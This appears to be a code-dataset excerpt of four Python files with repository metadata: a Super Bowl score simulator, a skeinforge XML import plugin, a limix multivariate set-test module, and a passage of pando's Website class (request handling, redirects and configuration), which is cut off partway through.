code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 31 21:48:40 2017
@author: Alexander
"""
import pandas as pd
import numpy as np
import random
#Super Bowl Simulator
#Using Negative Binomial Disribution
#Alexander Booth
#January 31, 2017
#define data
# Per-game points scored (offense) and allowed (defense) for each team,
# one entry per game of the 2016 season (18 games, incl. playoffs).
# NOTE(review): values hand-transcribed — confirm against box scores.
pats_off = np.array([23, 31, 27, 0, 33, 35, 27, 41, 24, 30, 22, 26, 30, 16, 41, 35, 34, 36])
pats_def = np.array([21, 24, 0, 16, 13, 17, 16, 25, 31, 17, 17, 10, 23, 3, 3, 14, 16, 17])
falc_off = np.array([24, 35, 45, 48, 23, 24, 30, 33, 43, 15, 38, 28, 42, 41, 33, 38, 36, 44])
falc_def = np.array([31, 28, 32, 33, 16, 26, 33, 32, 28, 24, 19, 29, 14, 13, 16, 32, 20, 21])
# Tidy per-game table; only used for inspection, the simulator takes means.
scores_df = pd.DataFrame(data = { "Pats_Off" : pats_off, "Pats_Def" : pats_def, "Falc_Off" : falc_off, "Falc_Def" : falc_def})
#define simulator
def simulator(team1_off_mean, team1_def_mean, team2_off_mean, team2_def_mean, niterations):
    """Monte-Carlo simulate `niterations` games between two teams.

    Each team's final score is the rounded average of a negative-binomial
    draw from its offensive scoring mean and one from the opponent's
    defensive (points-allowed) mean. Games that end in a tie or contain an
    impossible 1-point score are rejected and resampled.

    Args:
        team1_off_mean, team1_def_mean: team 1 mean points scored / allowed.
        team2_off_mean, team2_def_mean: team 2 mean points scored / allowed.
        niterations: number of (valid) games to simulate.

    Returns:
        np.array of [team1 win pct, team2 win pct, team1 mean score,
        team2 mean score, team1 score std, team2 score std].
    """
    # BUG FIX: the original called random.seed(1234), which seeds the stdlib
    # generator only — all sampling below uses np.random, so runs were not
    # reproducible. Seed numpy's generator instead.
    np.random.seed(1234)
    # Pre-allocate result arrays with zeros (the original used
    # np.array(range(n)), leaving misleading garbage before being filled).
    team1_game_score = np.zeros(niterations, dtype=int)
    team2_game_score = np.zeros(niterations, dtype=int)
    team1_wins = np.zeros(niterations, dtype=int)
    team2_wins = np.zeros(niterations, dtype=int)
    size = 4  # negative-binomial dispersion ("number of successes") parameter
    i = 0
    while i < niterations:
        # Sample from the negative binomial for each offense/defense statistic;
        # p = size / (size + mean) gives the distribution that mean.
        team1_off = np.random.negative_binomial(size, size/(size+team1_off_mean), 1)
        team1_def = np.random.negative_binomial(size, size/(size+team1_def_mean), 1)
        team2_off = np.random.negative_binomial(size, size/(size+team2_off_mean), 1)
        team2_def = np.random.negative_binomial(size, size/(size+team2_def_mean), 1)
        # Final game score: average a team's offense with the opponent's defense.
        team1_score = round(np.mean(np.array([team1_off, team2_def])))
        team2_score = round(np.mean(np.array([team2_off, team1_def])))
        # Reject impossible scores (1 point cannot occur in the NFL) ...
        if team1_score == 1 or team2_score == 1:
            continue
        # ... and ties; resample this game without advancing i.
        if team1_score == team2_score:
            continue
        # Record the score and the winner.
        team1_game_score[i] = team1_score
        team2_game_score[i] = team2_score
        if team1_score > team2_score:
            team1_wins[i] = 1
            team2_wins[i] = 0
        else:  # ties were rejected above, so team2 won
            team2_wins[i] = 1
            team1_wins[i] = 0
        i = i + 1
    # Win percentages over all simulated games.
    team1_win_pcnt = sum(team1_wins)/float(niterations)
    team2_win_pcnt = sum(team2_wins)/float(niterations)
    # Return win percentages, mean scores, and score standard deviations.
    return(np.array([team1_win_pcnt, team2_win_pcnt,
                     np.mean(team1_game_score), np.mean(team2_game_score),
                     np.std(team1_game_score), np.std(team2_game_score)]))
# Simulate the Super Bowl from each team's season scoring averages.
pats_off_mean, pats_def_mean, falc_off_mean, falc_def_mean = (
    np.mean(arr) for arr in (pats_off, pats_def, falc_off, falc_def)
)
niterations = 100000
final_scores = simulator(pats_off_mean, pats_def_mean, falc_off_mean, falc_def_mean, niterations)
print(final_scores)
"""
This page is in the table of contents.
The xml.py script is an import translator plugin to get a carving from an xml file.
An import plugin is a script in the interpret_plugins folder which has the function getCarving. It is meant to be run from the interpret tool. To ensure that the plugin works on platforms which do not handle file capitalization properly, give the plugin a lower case name.
The getCarving function takes the file name of an xml file and returns the carving.
An example of an xml boolean geometry format file follows below.
<?xml version='1.0' ?>
<fabmetheus version="2010-03-29">
<difference id="cube_cylinder_difference">
<matrix m14="-10.0" m24="20.0" m34="5.0" />
<cube id="Cube 5" halfx="5.0" halfy="5.0" halfz="5.0">
</cube>
<cylinder id="Cylinder 5" height="10.0" radiusx="5.0" radiusy="5.0" topOverBottom="1.0">
<matrix m14="5.0" m24="-5.0" />
</cylinder>
</difference>
</fabmetheus>
In the 'fabmetheus' format, all class names are lower case. The defined geometric objects are cube, cylinder, difference, group, sphere, trianglemesh and union. The id attribute is not necessary. The default matrix is a four by four identity matrix. The attributes of the cube, cylinder and sphere default to one. The attributes of the vertexes in the triangle mesh default to zero. The boolean solids are difference, intersection and union. The difference solid is the first solid minus the remaining solids. The combined_shape.xml example in the xml_models folder in the models folder is pasted below.
<?xml version='1.0' ?>
<fabmetheus version="2010-03-29">
<difference id="cube_cylinder_difference">
<matrix m14="-10.0" m24="20.0" m34="5.0" />
<cube id="Cube 5" halfx="5.0" halfy="5.0" halfz="5.0">
</cube>
<cylinder id="Cylinder 5" height="10.0" radiusx="5.0" radiusy="5.0" topOverBottom="1.0">
<matrix m14="5.0" m24="-5.0" />
</cylinder>
</difference>
<intersection id="cube_cylinder_intersection">
<matrix m14="-10.0" m34="5.0" />
<cube id="Cube 5" halfx="5.0" halfy="5.0" halfz="5.0">
</cube>
<cylinder id="Cylinder 5" height="10.0" radiusx="5.0" radiusy="5.0" topOverBottom="1.0">
<matrix m14="5.0" m24="-5.0" />
</cylinder>
</intersection>
<union id="cube_cylinder_union">
<matrix m14="-10.0" m24="-20.0" m34="5.0" />
<cube id="Cube 5" halfx="5.0" halfy="5.0" halfz="5.0">
</cube>
<cylinder id="Cylinder 5" height="10.0" radiusx="5.0" radiusy="5.0" topOverBottom="1.0">
<matrix m14="5.0" m24="-5.0" />
</cylinder>
</union>
<group id="sphere_tetrahedron_group">
<matrix m14="10.0" m24="-20.0" m34="5.0" />
<sphere id="Group Sphere 5" radiusx="5.0" radiusy="5.0" radiusz="5.0">
</sphere>
<trianglemesh id="Group Tetrahedron 5">
<matrix m14="15.0" />
<vertex x="-5.0" y="-5.0" z="-5.0" />
<vertex x="5.0" y="-5.0" z="-5.0" />
<vertex y="5.0" z="-5.0" />
<vertex z="5.0" />
<face vertex0="0" vertex1="2" vertex2="1" />
<face vertex0="3" vertex1="1" vertex2="2" />
<face vertex0="3" vertex1="2" vertex2="0" />
<face vertex0="3" vertex1="0" vertex2="1" />
</trianglemesh>
</group>
<sphere id="Sphere 5" radiusx="5.0" radiusy="5.0" radiusz="5.0">
<matrix m14="10.0" m34="5.0" />
</sphere>
<trianglemesh id="Tetrahedron 5">
<matrix m14="10.0" m24="20.0" m34="5.0" />
<vertex x="-5.0" y="-5.0" z="-5.0" />
<vertex x="5.0" y="-5.0" z="-5.0" />
<vertex y="5.0" z="-5.0" />
<vertex z="5.0" />
<face vertex0="0" vertex1="2" vertex2="1" />
<face vertex0="3" vertex1="1" vertex2="2" />
<face vertex0="3" vertex1="2" vertex2="0" />
<face vertex0="3" vertex1="0" vertex2="1" />
</trianglemesh>
</fabmetheus>
The 'fabmetheus' xml format is the preferred skeinforge format. When the Interpret button in the Interpret tool in Analyze is clicked, any xml format for which there is a plugin will be converted to the 'fabmetheus' format.
There is a plugin for the 'Art of Illusion' xml format. An xml file can be exported from Art of Illusion by going to the "File" menu, then going into the "Export" menu item, then picking the XML choice. This will bring up the XML file chooser window, choose a place to save the file then click "OK". Leave the "compressFile" checkbox unchecked. All the objects from the scene will be exported, the artofillusion plugin will ignore the light and camera. If you want to fabricate more than one object at a time, you can have multiple objects in the Art of Illusion scene and they will all be carved, then fabricated together.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.xml_simple_reader import DocumentNode
from fabmetheus_utilities import archive
from fabmetheus_utilities import gcodec
import os
import sys
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__credits__ = 'Nophead <http://hydraraptor.blogspot.com/>\nArt of Illusion <http://www.artofillusion.org/>'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def getCarving(fileName=''):
    """Get the carving for the xml file.

    Returns None when the file is empty/unreadable or when no plugin
    matches the document's (lower-cased) root element name; otherwise
    delegates to the plugin's getCarvingFromParser.
    """
    xmlText = archive.getFileText(fileName)
    if xmlText == '':
        return None
    xmlParser = DocumentNode(fileName, xmlText)
    # Plugins are looked up by the lower-cased root element name.
    lowerLocalName = xmlParser.getDocumentElement().getNodeName().lower()
    pluginModule = archive.getModuleWithDirectoryPath(getPluginsDirectoryPath(), lowerLocalName)
    # FIX (idiom): compare against None with 'is', not '=='.
    if pluginModule is None:
        return None
    return pluginModule.getCarvingFromParser(xmlParser)
def getPluginsDirectoryPath():
    "Get the plugins directory path."
    # NOTE(review): the doubled attribute access 'archive.archive' looks
    # suspicious — getCarving above calls 'archive.<fn>' directly. Confirm
    # whether the archive module really exposes a nested 'archive' member.
    return archive.archive.getInterpretPluginsPath('xml_plugins')
def main():
    """Run getCarving on the file name joined from the command-line arguments."""
    args = sys.argv[1:]
    if args:
        getCarving(' '.join(args))

if __name__ == "__main__":
    main()
| Pointedstick/ReplicatorG | skein_engines/skeinforge-44/fabmetheus_utilities/fabmetheus_tools/interpret_plugins/xml.py | Python | gpl-2.0 | 5,903 |
import sys
import limix
from limix.core.covar import LowRankCov
from limix.core.covar import FixedCov
from limix.core.covar import FreeFormCov
from limix.core.covar import CategoricalLR
from limix.core.mean import MeanBase
from limix.core.gp import GP
import scipy as sp
import scipy.stats as st
from limix.mtSet.core.iset_utils import *
import numpy as np
import numpy.linalg as nla
import scipy.linalg as la
import copy
import pdb
from limix.utils.preprocess import gaussianize
from scipy.optimize import fmin
import time
import pandas as pd
from .linalg_utils import msqrt
from .linalg_utils import lowrank_approx
ntype_dict = {'assoc':'null', 'gxe':'block', 'gxehet':'rank1'}
def define_gp(Y, Xr, mean, Ie, type):
    """Build a GP with mean *mean* and a CategoricalLR covariance.

    Args:
        Y: phenotype matrix (unused here; kept for signature compatibility).
        Xr: genotype matrix of the set component.
        mean: limix mean object.
        Ie: context/environment indicator.
        type: covariance structure — 'null', 'block', 'rank1' or 'full'.

    Raises:
        ValueError: if *type* is not one of the supported structures.
    """
    P = 2  # number of contexts
    if type == 'null':
        # Fixed near-zero region covariance (scale frozen at ~0).
        _Cr = FixedCov(sp.ones([2, 2]))
        _Cr.scale = 1e-9
        _Cr.act_scale = False
        covar = CategoricalLR(_Cr, sp.ones((Xr.shape[0], 1)), Ie)
    else:
        if type == 'block':
            _Cr = FixedCov(sp.ones((P, P)))
        elif type == 'rank1':
            _Cr = LowRankCov(P, 1)
        elif type == 'full':
            _Cr = FreeFormCov(P)
        else:
            # BUG FIX: was print('poppo'), which fell through and crashed
            # with a NameError on _Cr; fail loudly and clearly instead.
            raise ValueError("unknown covariance type: %s" % type)
        covar = CategoricalLR(_Cr, Xr, Ie)
    _gp = GP(covar=covar, mean=mean)
    return _gp
class MvSetTestInc():
def __init__(self, Y=None, Xr=None, F=None, factr=1e7, Ie=None, debug=False):
    """
    Args:
        Y: [N, 1] phenotype matrix
        Xr: [N, S] genotype data of the set component
        F: [N, K] fixed-effect design matrix (defaults to an intercept)
        factr: parameter that determines the accuracy of the solution
            (see scipy.optimize.fmin_l_bfgs_b for more details)
        Ie: [N] boolean context indicator (True = context 1)
        debug: if True, print progress information
    """
    if F is None:
        # BUG FIX: was sp.ones((y.shape[0], 1)) — 'y' is undefined (NameError);
        # the phenotype parameter is 'Y'.
        F = sp.ones((Y.shape[0], 1))
    # kroneckerize F: separate fixed-effect columns per context
    W = sp.zeros((Y.shape[0], 2*F.shape[1]))
    W[:, :F.shape[1]] = Ie[:, sp.newaxis] * F
    W[:, F.shape[1]:] = (~Ie[:, sp.newaxis]) * F
    self.mean = MeanBase(Y, W)
    # avoid SVD failures by adding some jitter
    Xr += 2e-6*(sp.rand(*Xr.shape)-0.5)
    # standardize genotypes and scale by sqrt(S)
    Xr -= Xr.mean(0)
    Xr /= Xr.std(0)
    Xr /= sp.sqrt(Xr.shape[1])
    # store stuff
    self.Y = Y
    self.F = F
    self.Xr = Xr
    self.Ie = Ie
    self.covY = sp.cov(Y.T)
    self.factr = factr
    self.debug = debug
    self.gp = {}    # fitted GP per model type
    self.info = {}  # fit summaries per model type
def assoc(self):
    """Fit the null and full models (if needed) and return the association
    log-likelihood ratio LML(null) - LML(full)."""
    for key in ['null', 'full']:
        if key not in self.gp:
            # FIX (consistency): debug message said '.. dening'; aligned
            # with the '.. defining' wording used by gxe() and gxehet().
            if self.debug: print('.. defining %s' % key)
            self.gp[key] = define_gp(self.Y, self.Xr, self.mean, self.Ie, key)
            if self.debug: print('.. fitting %s' % key)
            self.info[key] = self._fit(key, vc=True)
    return self.info['null']['LML'] - self.info['full']['LML']
def gxe(self):
    """Return the GxE log-likelihood ratio LML(block) - LML(full),
    fitting any of the required models that are not cached yet."""
    for model in ('null', 'full', 'block'):
        if model in self.gp:
            continue
        if self.debug:
            print('.. defining %s' % model)
        self.gp[model] = define_gp(self.Y, self.Xr, self.mean, self.Ie, model)
        if self.debug:
            print('.. fitting %s' % model)
        self.info[model] = self._fit(model, vc=True)
    return self.info['block']['LML'] - self.info['full']['LML']
def gxehet(self):
    """Return the heterogeneous-GxE log-likelihood ratio
    LML(rank1) - LML(full), fitting any missing models first."""
    for model in ('null', 'full', 'rank1'):
        if model in self.gp:
            continue
        if self.debug:
            print('.. defining %s' % model)
        self.gp[model] = define_gp(self.Y, self.Xr, self.mean, self.Ie, model)
        if self.debug:
            print('.. fitting %s' % model)
        self.info[model] = self._fit(model, vc=True)
    return self.info['rank1']['LML'] - self.info['full']['LML']
def assoc_null(self, n_nulls=30):
    """Empirical null distribution of the association LLR.

    Permutes the rows of Xr (breaking the genotype-phenotype link while
    keeping everything else fixed) and recomputes the association LLR on
    each permuted dataset.

    Returns:
        array of n_nulls LLR values.
    """
    LLR0 = sp.zeros(n_nulls)
    for ni in range(n_nulls):
        idx_perms = sp.random.permutation(self.Y.shape[0])
        _Xr = self.Xr[idx_perms]
        mvset0 = MvSetTestInc(Y=self.Y, F=self.F, Xr=_Xr, Ie=self.Ie)
        LLR0[ni] = mvset0.assoc()
    return LLR0
def gxe_null(self, n_nulls=30):
    """Parametric-bootstrap null distribution of the GxE LLR.

    Simulates phenotypes from the fitted 'block' model (fixed effects plus
    correlated noise) and recomputes the GxE LLR on each draw.

    NOTE(review): assumes self.gp['block'] has already been fitted, i.e.
    gxe() was called first — confirm callers respect this ordering.
    """
    LLR0 = sp.zeros(n_nulls)
    for ni in range(n_nulls):
        Xb = sp.dot(self.mean.W, self.mean.b)  # fixed-effect predictor
        _Y = Xb + self.gp['block'].covar.Kh_dot(sp.randn(self.Y.shape[0], 1))
        mvset0 = MvSetTestInc(Y=_Y, F=self.F, Xr=self.Xr, Ie=self.Ie)
        LLR0[ni] = mvset0.gxe()
    return LLR0
def gxehet_null(self, n_nulls=30):
    """Parametric-bootstrap null distribution of the heterogeneous-GxE LLR.

    Simulates phenotypes from the fitted 'rank1' model and recomputes the
    gxehet LLR on each draw.

    NOTE(review): assumes self.gp['rank1'] has already been fitted, i.e.
    gxehet() was called first — confirm callers respect this ordering.
    """
    LLR0 = sp.zeros(n_nulls)
    for ni in range(n_nulls):
        Xb = sp.dot(self.mean.W, self.mean.b)  # fixed-effect predictor
        _Y = Xb + self.gp['rank1'].covar.Kh_dot(sp.randn(self.Y.shape[0], 1))
        mvset0 = MvSetTestInc(Y=_Y, F=self.F, Xr=self.Xr, Ie=self.Ie)
        LLR0[ni] = mvset0.gxehet()
    return LLR0
def _fit(self, type, vc=False):
    """Initialise and optimise the GP for model *type*.

    Warm-starts each model's covariance from a simpler, already-fitted
    model ('full' from 'null'; 'block'/'rank1' from 'full').

    Args:
        type: one of 'null', 'full', 'block', 'rank1'.
        vc: if True, also estimate variance components.

    Returns:
        dict with 'Cr', 'Cn', 'B', 'conv', 'LML', 'LMLgrad' and, when
        vc=True, 'var' (and 'var_r' for the full model).
    """
    # 2. init: warm-start covariances
    if type == 'null':
        self.gp[type].covar.Cn.setCovariance(sp.eye(2))
    elif type == 'full':
        Cr0_K = 1e-4*sp.ones((2,2)) + 1e-4*sp.eye(2)
        Cn0_K = 0.99*self.gp['null'].covar.Cn.K()
        self.gp[type].covar.Cr.setCovariance(Cr0_K)
        self.gp[type].covar.Cn.setCovariance(Cn0_K)
    elif type == 'block':
        Crf_K = self.gp['full'].covar.Cr.K()
        Cnf_K = self.gp['full'].covar.Cn.K()
        self.gp[type].covar.Cr.scale = sp.mean(Crf_K)
        self.gp[type].covar.Cn.setCovariance(Cnf_K)
    elif type == 'rank1':
        Crf_K = self.gp['full'].covar.Cr.K()
        Cnf_K = self.gp['full'].covar.Cn.K()
        self.gp[type].covar.Cr.setCovariance(Crf_K)
        self.gp[type].covar.Cn.setCovariance(Cnf_K)
    else:
        # BUG FIX: was print('poppo') followed by a KeyError on self.gp[type];
        # fail loudly instead.
        raise ValueError("unknown model type: %s" % type)
    conv = self.gp[type].optimize(factr=self.factr, verbose=False)[0]
    # BUG FIX: integer division — under Python 3 '/' yields a float and
    # ndarray.reshape rejects non-integer dimensions; use '//'.
    B = self.gp[type].mean.b.reshape((self.mean.W.shape[1]//2, 2), order='F')
    RV = {'Cr': self.gp[type].covar.Cr.K(),
          'Cn': self.gp[type].covar.Cn.K(),
          'B': B,
          'conv': sp.array([conv]),
          'LML': sp.array([self.gp[type].LML()]),
          'LMLgrad': sp.array([sp.mean((self.gp[type].LML_grad()['covar'])**2)])}
    if vc:
        # tr(P WW) = tr(PWWP) = ((PW)**2).sum()
        # tr(P D) = (PD).sum() = D.sum() - 1/n * (Ones*D).sum()
        #         = D.sum() - D.sum()
        PW = self.gp[type].covar.W()
        PW -= PW.mean(0)
        var_r = (PW**2).sum() / float(self.Y.size-1)          # region variance
        var_c = sp.var(sp.dot(self.mean.W, self.gp[type].mean.b))  # covariate variance
        D = self.gp[type].covar.d_inv()**(-1)
        var_n = (1-1/float(D.shape[0]))*D.sum()/float(self.Y.size-1)  # noise variance
        #var_n = sp.diagonal(sp.diag(D)-sp.diag(D).mean(0)).sum()/float(self.Y.size-1)
        RV['var'] = sp.array([var_r, var_c, var_n])
        # Disabled sanity check against the explicit (kron-expanded) kernels.
        if 0 and self.Y.size < 5000:
            pdb.set_trace()
            Kr = sp.kron(RV['Cr'], sp.dot(self.Xr, self.Xr.T))
            Kn = sp.kron(RV['Cn'], sp.eye(self.Y.shape[0]))
            _var_r = sp.trace(Kr-Kr.mean(0)) / float(self.Y.size-1)
            _var_n = sp.trace(Kn-Kn.mean(0)) / float(self.Y.size-1)
            _var = sp.array([_var_r, var_c, _var_n])
            print(((_var-RV['var'])**2).mean())
        if type == 'full':
            trRr = (self.Xr**2).sum()
            # calculate within region vcs: split Cr into block (shared),
            # rank-1 (heterogeneous), and residual components
            Cr_block = sp.mean(RV['Cr']) * sp.ones(RV['Cr'].shape)
            Cr_rank1 = lowrank_approx(RV['Cr'], rank=1)
            var_block = sp.trace(Cr_block)*trRr / float(self.Y.size-1)
            var_rank1 = sp.trace(Cr_rank1)*trRr / float(self.Y.size-1)
            RV['var_r'] = sp.array([var_block, var_rank1-var_block, var_r-var_rank1])
    return RV
# Dead code: permanently disabled with 'if 0:'. Kept for reference only.
# NOTE(review): _sim_from references attributes (self.block, self.lr,
# self.XXh) that are never defined in MvSetTestInc, and the 'seed'
# parameter is never used — it would fail if re-enabled.
if 0:
    def _sim_from(self, set_covar='block', seed=None, qq=False):
        """Simulate phenotypes from a fitted model (legacy, disabled)."""
        ##1. region term
        if set_covar == 'block':
            Cr = self.block['Cr']
            Cg = self.block['Cg']
            Cn = self.block['Cn']
        if set_covar == 'rank1':
            Cr = self.lr['Cr']
            Cg = self.lr['Cg']
            Cn = self.lr['Cn']
        Lc = msqrt(Cr)
        U, Sh, V = nla.svd(self.Xr, full_matrices=0)
        Lr = sp.zeros((self.Y.shape[0], self.Y.shape[0]))
        Lr[:, :Sh.shape[0]] = U * Sh[sp.newaxis, :]
        Z = sp.randn(*self.Y.shape)
        Yr = sp.dot(Lr, sp.dot(Z, Lc.T))
        ##2. bg term
        Lc = msqrt(Cg)
        Lr = self.XXh
        Z = sp.randn(*self.Y.shape)
        Yg = sp.dot(Lr, sp.dot(Z, Lc.T))
        # noise terms
        Lc = msqrt(Cn)
        Z = sp.randn(*self.Y.shape)
        Yn = sp.dot(Z, Lc.T)
        # normalize
        Y = Yr + Yg + Yn
        if qq:
            Y = gaussianize(Y)
            Y -= Y.mean(0)
            Y /= Y.std(0)
        return Y
if __name__=='__main__':
    # Smoke test / interactive demo on synthetic data.
    if 1:
        N = 1000  # individuals
        S = 20    # variants in the set
        Xr = 1.*(sp.rand(N,S)<0.2)  # binary genotypes, ~20% carrier frequency
        Ie = sp.randn(N)<0.         # random context indicator (~50/50 split)
        Y = sp.randn(N, 1)          # random phenotype
        F = sp.ones((N,1))          # intercept-only covariates
        # NOTE(review): pdb.set_trace() drops into the debugger and blocks
        # execution — presumably intentional for interactive inspection.
        pdb.set_trace()
        t0 = time.time()
        mvset = MvSetTestInc(Y=Y, Xr=Xr, F=F, Ie=Ie, factr=1e7)
        # run all three tests, then their null distributions
        mvset.assoc()
        mvset.gxe()
        mvset.gxehet()
        print('.. permutations')
        mvset.assoc_null()
        print('.. bootstrap gxe')
        mvset.gxe_null()
        print('.. bootstrap gxehet')
        mvset.gxehet_null()
        print(time.time()-t0)
        pdb.set_trace()
| PMBio/limix | limix/iSet/mvSetInc.py | Python | apache-2.0 | 9,524 |
"""
:mod:`website`
==============
"""
from copy import copy
from datetime import datetime, timezone
import os
import string
from urllib.parse import quote
from aspen.request_processor import RequestProcessor
from aspen.simplates.simplate import Simplate
from state_chain import StateChain
from . import body_parsers
from .http.request import SAFE_METHODS
from .http.response import Response
from .utils import maybe_encode, to_rfc822
from .exceptions import BadLocation
# 2006-11-17 was the first release of Aspen - v0.3
# NOTE(review): THE_PAST is presumably used as an always-expired RFC 822
# date for cache-related headers — confirm at call sites.
THE_PAST = to_rfc822(datetime(2006, 11, 17, tzinfo=timezone.utc))
# Directory where the pando package itself is installed.
PANDO_DIR = os.path.dirname(os.path.abspath(__file__))
class Website:
"""Represent a website.
This object holds configuration information, and how to handle HTTP
requests (per WSGI). It is available to user-developers inside of their
simplates and state chain functions.
:arg kwargs: configuration values. The available options and their default
values are described in :class:`pando.website.DefaultConfiguration`
and :class:`aspen.request_processor.DefaultConfiguration`.
"""
def __init__(self, **kwargs):
    """Build the Aspen request processor, the state chain, configuration
    attributes, and the body-parser registry."""
    #: An Aspen :class:`~aspen.request_processor.RequestProcessor` instance.
    self.request_processor = RequestProcessor(**kwargs)
    # Make pando's own bundled resources (pando/www) resolvable.
    pando_resources_dir = os.path.join(PANDO_DIR, 'www')
    self.request_processor.resource_directories.append(pando_resources_dir)
    pando_chain = StateChain.from_dotted_name('pando.state_chain')
    # Swap each chain function for its 'placeholder_for' attribute when it
    # has one. NOTE(review): presumably lets decorated functions expose a
    # stand-in — confirm against pando.state_chain.
    pando_chain.functions = [
        getattr(f, 'placeholder_for', f) for f in pando_chain.functions
    ]
    #: The chain of functions used to process an HTTP request, imported from
    #: :mod:`pando.state_chain`.
    self.state_chain = pando_chain
    # configure from defaults and kwargs; copy() ensures mutable defaults
    # (e.g. lists) are not shared across Website instances
    defaults = [(k, v) for k, v in DefaultConfiguration.__dict__.items() if k[0] != '_']
    for name, default in sorted(defaults):
        if name in kwargs:
            self.__dict__[name] = kwargs[name]
        else:
            self.__dict__[name] = copy(default)
    # add ourself to the initial context of simplates
    Simplate.defaults.initial_context['website'] = self
    # load bodyparsers
    #: Mapping of content types to parsing functions.
    self.body_parsers = {
        "application/x-www-form-urlencoded": body_parsers.formdata,
        "multipart/form-data": body_parsers.formdata,
        self.request_processor.media_type_json: body_parsers.jsondata
    }
def __call__(self, environ, start_response):
    """Alias of :meth:`wsgi_app`.
    """
    # Makes the Website instance itself a WSGI callable (PEP 3333).
    return self.wsgi_app(environ, start_response)
def wsgi_app(self, environ, start_response):
    """WSGI interface.
    Wrap this method (instead of the website object itself) when you want
    to use WSGI middleware::
        website = Website()
        website.wsgi_app = WSGIMiddleware(website.wsgi_app)
    """
    # Run the state chain, then hand serialization off to Response.to_wsgi.
    response = self.respond(environ)['response']
    return response.to_wsgi(environ, start_response, self.request_processor.encode_output_as)
def respond(self, environ, raise_immediately=None, return_after=None):
    """Run the state chain on a WSGI environ and return the resulting
    state dict (which includes the 'response' key)."""
    chain_kwargs = dict(
        website=self,
        environ=environ,
        _raise_immediately=raise_immediately,
        _return_after=return_after,
    )
    return self.state_chain.run(**chain_kwargs)
def redirect(self, location, code=None, permanent=False, base_url=None, response=None):
    """Raise a redirect Response.
    If code is None then it will be set to 301 (Moved Permanently) if
    permanent is True and 302 (Found) if it is False. If url doesn't start
    with base_url (defaulting to self.base_url), then we prefix it with
    base_url before redirecting. This is a protection against open
    redirects. If you wish to use a relative path or full URL as location,
    then base_url must be the empty string; if it's not, we raise
    BadLocation. If you provide your own response we will set .code and
    .headers['Location'] on it.
    """
    response = response if response else Response()
    response.code = code if code else (301 if permanent else 302)
    base_url = base_url if base_url is not None else self.base_url
    # Percent-encode the location; string.punctuation is the 'safe' set,
    # so '/', ':', '?', '&', '=' etc. pass through unescaped.
    location = quote(location, string.punctuation)
    if not location.startswith(base_url):
        # Open-redirect protection: pin the redirect to our own base URL.
        newloc = base_url + location
        if not location.startswith('/'):
            raise BadLocation(newloc)
        location = newloc
    response.headers[b'Location'] = maybe_encode(location)
    # The Response is raised, not returned — presumably caught further up
    # the state chain; confirm in pando.state_chain.
    raise response
# Base URL Canonicalization
# =========================

# Safe (read-only) methods redirect with 302; unsafe methods use 307 so
# the client repeats the request with the same method and body.
_canonicalize_base_url_code_for_safe_method = 302
_canonicalize_base_url_code_for_unsafe_method = 307

def canonicalize_base_url(self, request):
    """Enforces a base_url such as http://localhost:8080 (no path part).
    See :attr:`.Request.host` and :attr:`.Request.scheme` for how the
    request host and scheme are determined.
    """
    if not self.base_url:
        return  # canonicalization disabled when no base_url is configured
    request_base_url = request.scheme + "://" + request.host
    if request_base_url == self.base_url:
        return  # already canonical
    # Rebuild the URL on the canonical base, preserving path and query.
    url = self.base_url + request.path.raw
    if request.qs:
        url += '?' + request.qs.raw
    if request.method in SAFE_METHODS:
        code = self._canonicalize_base_url_code_for_safe_method
    else:
        code = self._canonicalize_base_url_code_for_unsafe_method
    self.redirect(url, code=code)
# File Resolution
# ===============

def find_ours(self, filename):
    """Given a ``filename``, return the filepath to pando's internal version
    of that filename.
    No existence checking is done, this just abstracts away the ``__file__``
    reference nastiness.
    """
    # PANDO_DIR/www is where pando's bundled resources live.
    return os.path.join(PANDO_DIR, 'www', filename)
def ours_or_theirs(self, filename):
    """Given a filename, return a filepath or ``None``.

    The user's :attr:`project_root` takes precedence over Pando's bundled
    files; ``None`` is returned when the file exists in neither place.
    """
    candidates = []
    if self.project_root is not None:
        candidates.append(os.path.join(self.project_root, filename))
    candidates.append(self.find_ours(filename))
    for path in candidates:
        if os.path.isfile(path):
            return path
    return None
# Backward compatibility
# ======================

# Read-only aliases kept so pre-refactor call sites keep working.

@property
def default_renderers_by_media_type(self):
    "Reference to :obj:`Simplate.default_renderers_by_media_type`, for backward compatibility."
    return Simplate.default_renderers_by_media_type

@property
def project_root(self):
    "Reference to :obj:`self.request_processor.project_root`, for backward compatibility."
    return self.request_processor.project_root

@property
def renderer_factories(self):
    "Reference to :obj:`Simplate.renderer_factories`, for backward compatibility."
    return Simplate.renderer_factories

@property
def www_root(self):
    "Reference to :obj:`self.request_processor.www_root`, for backward compatibility."
    return self.request_processor.www_root
class DefaultConfiguration:
    """Default configuration of :class:`Website` objects.

    Each public attribute here is copied onto Website instances in
    ``Website.__init__`` (mutable defaults go through ``copy.copy``, so
    instances do not share state with this class).
    """
    base_url = ''
    """
    The website's base URL (scheme and host only, no path). If specified, then
    requests for URLs that don't match it are automatically redirected. For
    example, if ``base_url`` is ``https://example.net``, then a request for
    ``http://www.example.net/foo`` is redirected to ``https://example.net/foo``.
    """
    colorize_tracebacks = True
    "Use the Pygments package to prettify tracebacks with syntax highlighting."
    known_schemes = {'http', 'https', 'ws', 'wss'}
    """
    The set of known and acceptable request URL schemes. Used by
    :attr:`.Request.scheme`.
    """
    list_directories = False
    "List the contents of directories that don't have a custom index."
    show_tracebacks = False
    "Show Python tracebacks in error responses."
    trusted_proxies = []
    """
    The list of reverse proxies that requests to this website go through. With
    this information we can accurately determine where a request came from (i.e.
    the IP address of the client) and how it was sent (i.e. encrypted or in
    plain text).
    Example::
        trusted_proxies=[
            ['private'],
            [IPv4Network('1.2.3.4/32'), IPv6Network('2001:2345:6789:abcd::/64')]
        ]
    Explanation: :attr:`trusted_proxies` is a list of proxy levels, with each
    item being a list of IP networks (:class:`~ipaddress.IPv4Network` or
    :class:`~ipaddress.IPv6Network` objects). The special value :obj:`'private'`
    can be used to indicate that any private IP address is trusted (the
    :attr:`~ipaddress.IPv4Address.is_private` attribute is used to determine
